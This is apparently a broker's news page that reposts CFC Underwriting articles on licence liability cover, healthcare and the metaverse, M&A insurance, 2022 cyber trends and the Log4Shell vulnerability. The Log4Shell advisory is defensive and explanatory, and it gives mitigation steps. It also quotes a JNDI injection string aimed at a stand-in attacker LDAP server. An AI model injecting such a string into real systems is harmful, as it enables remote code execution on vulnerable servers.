1-888-643-2217 Email ABEX
Keeping you updated

Licensing Liability Risks

Many businesses such as food companies, manufacturers, fashion firms use third party intellectual property (IP) provided to them by way of a license agreement.

CFC specialist product provides protection for unintentional breaches of this agreement. Check out some of our recent risks in this area.

Celebrity endorsement deal

A drinks company had an endorsement agreement with a renowned music artist with the intention that the artist would promote and market the drinks on the artist’s social media platforms, as well as at concerts and events. The agreement required the artist to purchase insurance for breach of contract, as well as IP infringement and breach of confidentiality. The artist had media liability insurance for their music but didn’t have anything in place for the endorsement agreement.

CFC’s license agreement liability policy provided a solution for this, specific to the drink’s company’s contract.

Merchandise license agreement

A manufacturer of collectibles had an agreement with a major toy company to use popular imagery on some merchandise. The manufacturer carried a small errors and omissions sub-limit on their package policy, but their policy’s $250k sub-limit for IP infringement did not meet the toy company’s requirements for a $2m limit, and the existing insurer had no capacity to increase it.

CFC were able to write a contract specific policy which met the toy company’s requirements, enabling the manufacturer to sign the agreement and earn profit from the merchandise sales.

Brand sponsorship of events

A car company and a credit card company sponsor a popular food festival in the USA. As part of their agreement with the festival organizer, they license the use of their logos, trademarks and promotional videos to the festival for a short period of time. As licensors, they are concerned with the protection of their IP and trademarks and request the licensee to purchase IP infringement cover, as well as breach of the sponsorship agreement, so they insert a $5m insurance requirement into the agreement.

The festival organizer was able to purchase cover from CFC for both sponsorship agreements under a single policy.

Naming rights

A cryptocurrency exchange wanted to become sponsors of their local basketball team in the USA to show their support and increase the visibility of their brand. The sponsorship involved a change in name of the basketball arena that the team trained in. Originally it was named after the previous sponsor, an airline, but it would now be changed to the name of the cryptocurrency exchange.

The contractual agreement presented an IP exposure that the sponsored party did not have cover for, since they were granted rights to use players’ images and team logos in their own advertising, CFC’s license agreement liability policy was able to satisfy this need.

Source: www.cfcunderwriting.com

Metaverse and Healthcare in Tandem

There is already an ongoing move towards digital healthcare, which enables patients and healthcare professionals to view, share, exchange, create, or otherwise interact with digital content. In practice, it means the ability to do things such as make appointments online, provide consultations by video conferencing, and maintain patient files digitally and in the cloud.

The metaverse moves things on and offers a more interactive experience. It uses virtual reality, augmented reality and/or merged reality to create a fully synthetic or enhanced physical experience.

So, how does this play out in practice? Well, let’s take a few examples. In 2020, EndeavorRX became the first virtual reality game to be approved by the United States Food and Drug Administration as a prescribed treatment for children with attention deficit hyperactivity disorder. Increasingly, healthcare professionals are exploring how virtual reality games could help to treat other conditions such as depression and post-traumatic stress disorder.

Metaverse technology is also breaking new ground in the operating theatre. One example is xvision, which is an augmented reality surgical navigation system. The headset projects CT scan images on to the surgeon’s retina, enabling them to maintain their focus on the patient during surgery and avoid the need to look back and forth at a screen during the operating procedure.

Money in a healthy metaverse
Metaverse technologies might not yet be the common staple of the digital health market, but they are gaining traction quickly. There’s been $198m in funding for US digital health startups integrating VR or AR technologies in 2021, more than double that of 2020.

There is a lot of interest in the patent and trademark status of these technologies and the licenses in place to use them.

The importance of this protection in the healthcare market was underscored recently by CVS Health. It wants to be recognized as the first pharmacy in the metaverse and has made an application to the United States Patent and Trademark Office to trademark its logo and the activities of its online store.

The healthcare metaverse future is largely unknown
As the healthcare metaverse expands, so do the risks. We don’t know everything, but we can prepare for as much as we can. Healthcare companies will need to protect the proprietary and licensed technology and products they are using in this space, as well as the patients they are attending to. The competition will be fierce and access to insurance protection and expertise will be increasingly valuable.

Source: www. cfcunderwriting.com

What to Know when your Client is Selling their Business

M&A transactions are complicated and often fraught with risk. As your client looks to you as a trusted advisor during a business sale, what advice can you offer them to make sure they exit with the sale-price proceeds in their pocket?

Here are 4 key things you should know when your SME client is selling their business, and the important role of M&A insurance in facilitating their deal.

The buyer can claim against your client even after the deal closing
During an M&A transaction, SME owners can be mistaken in thinking that their contractual obligations are complete once the deal closes. However, many risks in M&A come after the deal closes and may not arise for a significant amount of time. In fact, a buyer can make a claim against the seller for breach of sale contract up to 6 years after the business has been sold!

If a buyer asserts a breach of a representation or warranty in the sale contract, the seller would be responsible for defense costs, as well as reimbursing the buyer for the loss suffered if the claim is valid or settled.

For some small business sellers who don’t have adequate protection in place, they risk having to hand back some, or all, of their proceeds.

Innocent misrepresentations can damage a deal
One of the biggest risks when it comes to M&A transactions is innocent misrepresentations. An innocent misrepresentation is a statement by the seller that is neither fraudulent nor negligent, but that is still untrue. Often unknowingly. Your client may claim to know their company inside out, but in an evolving and fast-changing regulatory environment, even the most well-intentioned seller can have blind spots. These accidental misrepresentations can still be claimed against after the deal is done and the seller would be responsible.

Existing insurance is unlikely to provide adequate cover
Many SME sellers will have E&O or D&O cover for their businesses, but they can be caught off guard when they learn those policies won’t protect them during the sale of their business. The most common misunderstanding is that D&O policies will cover breach of representation in a sale, which is almost universally untrue.

M&A insurance can really help small deals
A key benefit of M&A insurance is that it provides SME sellers with cover for indemnity and defense costs arising from a claim, giving sellers peace of mind should the worst happen. It can also help the seller negotiate to reduce, or eliminate, their escrow obligations and unlock the sale proceeds immediately after the deal closing. In many cases, M&A insurance can even put the seller in a better negotiating position and enable them to maximize the sale price of their business.

CFC recently launched a first-to-market transaction liability policy created specifically to protect small business sellers in M&A deals.

If you have any questions, please follow the link below.

Source: www.cfcunderwriting.com

Cyber Trends Predicted for 2022

2021 was certainly a time of change for the cyber insurance market and it’s looking like 2022 will be no different.

The cyber threat landscape over the last year has proven to be the most volatile yet in the history of the market, for the simple reason that the risk is too low and the profitability too high for threat actors. As a result, cyber insurers have had to evolve just as quickly to prevent and respond, leading to the following predictions for the year ahead:

Zero-day ransomware attacks
Zero-day ransomware attacks will dominate the headlines, whereby criminals exploit software vulnerabilities before any patches are available to avoid them by businesses. This means that the only way to prevent an attack is through improved security controls in advance.

Fear of a systemic risk event
Third party dependencies will continue to be a weak link for cyber risk. Managed service providers and cloud computing providers will continue to be lucrative targets for cybercriminals, with the fear of the next large-scale systemic risk event – where a single event has the potential to impact thousands of businesses – at the forefront of everyone’s mind.

Cyber insurance = risk management service
Cyber insurance will predominantly become a proactive risk management service. Insurers will seek to prevent claims before they happen and will pivot to conducting scans to detect vulnerabilities as an added service through mobile app technology.

Increased regulatory and governmental scrutiny
Increased scrutiny by both regulators and government advisory groups with a focus on improving security standards for businesses to prevent attacks. Equally, government bodies will seek to ensure there is more transparency around when businesses decide to pay ransom demands through legislation.

Targeting manufacturers and distributors
Criminals will continue to target businesses in industries where standards for security have historically been weak. Manufacturers and distributors have been particularly impacted in the last year given dependencies on automation, robotics, and the supply chain as entryways in their networks.

Continual hardening of the market
As a result, the cyber market is expected to continue to harden with more corrective action taken on rates to ensure the coverage can be maintained as broadly as it has been. Cyber will move from ‘hard to sell’ to ‘hard to buy’ based on limited available capacity, and undoubtedly become where a company’s largest exposure now lies.

So, that’s what CFC thinks will be the most prominent trends hitting the cyber insurance market throughout 2022, but what do you think?


Source: www.cfcunderwriting.com

Log4Shell Vulnerability

Log4Shell (CVE-2021-44228) is a critical vulnerability that has been actively exploited and scanned for by malicious actors since its discovery beginning of December. It enables attackers to run arbitrary code on servers running vulnerable versions of the Apache Log4j 2 library.

What is Log4j 2?

The Log4Shell vulnerability results from how log messages are being handled by the processor in log4j2, an open-source logging service provided by the Apache Group that provides logging for numerous projects. It enables attackers to run arbitrary code on servers running vulnerable versions of the Apache Log4j 2 library.

An attacker can send a specially crafted message, which contains a link to a server they control. For example, they may send a message including the string ${jndi:ldap://evil.xa/x}, where ldap://evil.xa is the attacker-controlled server.

The specially crafted message is passed to the log4j library so it can be logged, but in doing so it queries the malicious server. The malicious server will then respond with directory information, along with whatever code the attacker wants to execute on the victim server. Finally, the victim server downloads this response and executes the code included in the response.

Some of the products known to be using this, and therefore vulnerable to the vulnerability, are:

Apache Druid
Apache Dubbo
Apache Flink
Apache Flume
Apache Hadoop
Apache Kafka
Apache Solr
Apache Spark
Apache Struts
Apache Tapestry
Apache Wicket
Elastic Elasticsearch
Elastic Logstash
Apache Tomcat
Elastic Kibana
JavaServer Faces
Oracle ATG Web Commerce
Spring Framework

Why is this critical?

The vulnerability itself allows an attacker to load arbitrary – potentially malicious – code into the target server. This code might add a backdoor to a server, cryptojack or even carry out a ransomware attack.

The vulnerability was published earlier in December alongside a working proof-of-concept that would enable malicious actors to exploit it.

How to mitigate?

To mitigate against this vulnerability, we recommend installing the latest updates (2.15.0 or later), and the regular and timely updating of any affected third-party software. This should be done on all devices, not only those directly exposed to the internet.

To support the first priority action above, you also should determine if Log4j is installed elsewhere. Java applications can include all the dependent libraries within their installation. To do this, you should undertake a file system search for log4j, searching inside EAR, JAR and WAR files e.g.:

find / -type f -print0 |xargs -n1 -0 zipgrep -i log4j2 2>/dev/null

If a dependency or package manager is used, this can be searched. For example:

dpkg -l | grep log4j

There could be multiple copies of Log4j present and each copy will need to be updated or mitigated.

If updating Log4j 2 is not feasible, this vulnerability can still be mitigated by setting system property “log4j2.formatMsgNoLookups” to “true”. This can be done by restarting the Java service through the use of an argument:

java -Dlog4j2.formatMsgNoLookups=true …

or you can set an Environment Variable for the JVM arguments:


Please contact your IT department with any questions on updates needed.

Source: www.cfcunderwriting.com




Receive notifications of new posts automatically.


Like us on Facebook

Connect with us on LinkedIn